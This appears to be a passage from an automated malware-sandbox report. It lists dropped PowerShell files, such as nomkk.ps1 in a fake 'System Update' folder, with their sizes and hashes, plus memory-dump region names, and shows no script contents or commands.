SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\nomkk.ps1

Filesize
1.2MB

MD5
8481d9764cda27d097559253f6c5804a

SHA1
813e576e5f5ee54ee74ead61e30b6e3d04a377a3

SHA256
3d641dae182ce73851fcfb842ba19ba70f0e5c2b02730fc66948cec688d3949d

SHA512
3a0b4eb5fd1e01656256308c40e5eca3eb036e33fe686ce22dc6223b2057359db0da020aab8d80c1c68f0b60b17565bf37c60e76224b4fecb5c320c52d9cd282

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
297bfd26c196d201ac2af41bb46799a7

SHA1
99a4596cbbf1343300839c87a671c1b50b264a1d

SHA256
7d424d57bac9d3460e3263f525be255d770dae646f9e6aef89a5eff5bfc79460

SHA512
3db1c1cca6755db63639e0b8aa4529f6202b62c76e1c0546f832c3e0945c3a319757bd3e52985f107d4f5b03d3bbf26817a07eaecfe028056a74f38dda6b1674

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cbd4ad963aa0baf32c4ecd5d2ebfedb5

SHA1
5fd1284435734eebf8bee8f2c49407409ff0396e

SHA256
771af9fcae2de8c2f961cba80367d6b35966535fa8a412bf4acfe3e02277d1e0

SHA512
d7618682265630503c5b43f909f29c364506bc95652b735aade9f94c6a88fa41614703ce0b3d0a2e2b43457b8ec67d847e89583e7ec08f358892a6714e58cc77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
321539e964a48e737c6d3df62c75187b

SHA1
962e4612bb430cdc2469646feec0b975eed257c4

SHA256
f8f5be10d4a56ccc95180eaa7142525e423f05769bf42999cfd008ff26a2a41b

SHA512
516fac02dd40ef6e79d80efbdbea3df2102542b6131b69640fcb32a40deaa6c98718de39777d8ada7ec1b3a3973744a18e11e9b0271fbb2a6cbc9cd37e2b4470

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5490d976972c6ab09db15e1fe42c9ad9

SHA1
7ecdfce42a9abf50e0fc6df5db47079a73c1bce1

SHA256
830d620090ef199c04aebb6e4476be2b82f76e3f1e402b187b89c990e703df9f

SHA512
42f61025abb433a40d0b4f153b2adb24ceb5e4d11af77fc811a31c7b8cb0276adb265f5740d781374cbb263eb14249026e1897019fd7bb56e8be3cee9092536d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5dbtmbmt.b0n.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/1532-43-0x00000197E9B60000-0x00000197E9B6A000-memory.dmp

Filesize
40KB

Download
memory/3256-208-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/3256-207-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/3256-203-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/4388-7-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/4388-10-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/4388-169-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/4388-185-0x00007FFD1CD30000-0x00007FFD1D71C000-memory.dmp

Filesize
9.9MB

Download
memory/4388-5-0x0000021769C70000-0x0000021769C92000-memory.dmp

Filesize
136KB

Download
memory/4388-168-0x00007FFD1CD33000-0x00007FFD1CD34000-memory.dmp

Filesize
4KB

Download
memory/4388-9-0x0000021769F80000-0x0000021769FF6000-memory.dmp

Filesize
472KB

Download
memory/4388-0-0x00007FFD1CD33000-0x00007FFD1CD34000-memory.dmp

Filesize
4KB

Download
memory/5020-200-0x000001A674390000-0x000001A67439A000-memory.dmp

Filesize
40KB

Download